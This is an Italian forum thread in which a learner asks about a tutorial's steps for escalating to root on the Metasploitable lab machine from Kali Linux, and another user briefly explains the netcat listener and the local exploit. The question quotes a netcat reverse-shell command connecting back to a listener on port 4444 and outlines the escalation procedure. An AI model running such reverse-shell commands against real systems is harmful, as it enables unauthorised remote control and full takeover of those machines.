Kali Linux Teoria hacklog puntata 9 per diventare root

Stato
Discussione chiusa ad ulteriori risposte.

boomer22

Utente Electrum
17 Novembre 2009
88
33
4
102
Avrei bisogno di qualcuno che risponda a queste domande teoriche, sono in crisi....
La procedura per passare da utente senza privilegi a utente root è la seguente, ma ho i seguente dubbi:

devo scaricare l'exploit, compilare l'exploit (su metaspoitable),
aprire una connessione dentro kali linux (con il comando "netcat") sulla porta 4444 e mi metto in ascolto .
Quindi tornerò sul mio server (da kali linux all'interno del server metaspoitable) vado a creare una shell, la carico dentro la cartella tmp --------> Come faccio? echo '#!/bin/sh' > /tmp/run ??
A CHE SERVE AVER MESSO LA MACCHINA KALI LINUX IN ASCOLTO???????


Quindi andrò a incollare il processo di netcat alla shell che abbiamo
creato (su metaspoitable) e impartirò l'ordine che quella shell dovrà essere collegata alla kalilinux sempre
passando per i file temporanei -------> come faccio? echo '/bin/netcat -e /bin/sh 192.168.1.10 4444' ??
che si intende per incollare/attaccare netcat alla shell su metaspoitable????

Quindi dai processi attivi della metaspoitable vado a prendere il process id dell'utente root e faro una sottrazione di 1, perchè così è descritto dall'exploit che andiamo a scaricare e poi vado a effettuare l'exploit.

E L'EXPLOIT A CHE SERVE A STO PUNTO ??????
 
Avrei bisogno di qualcuno che risponda a queste domande teoriche, sono in crisi....
La procedura per passare da utente senza privilegi a utente root è la seguente, ma ho i seguente dubbi:

devo scaricare l'exploit, compilare l'exploit (su metaspoitable),
aprire una connessione dentro kali linux (con il comando "netcat") sulla porta 4444 e mi metto in ascolto .
Quindi tornerò sul mio server (da kali linux all'interno del server metaspoitable) vado a creare una shell, la carico dentro la cartella tmp --------> Come faccio? echo '#!/bin/sh' > /tmp/run ??
A CHE SERVE AVER MESSO LA MACCHINA KALI LINUX IN ASCOLTO???????
ti metti in ascolto perchè se non apri le porte tcp o udp alla connessione non riuscirai a comunicare i tuoi comandi e le tue intenzione alla macchina attaccata.
E L'EXPLOIT A CHE SERVE A STO PUNTO ??????
exploit in questo caso serve alla local privilege escalation ovvero per diventare root e avere tutti i permessi di lettura,scrittura ed esecuzione nella macchina attaccata
 
Stato
Discussione chiusa ad ulteriori risposte.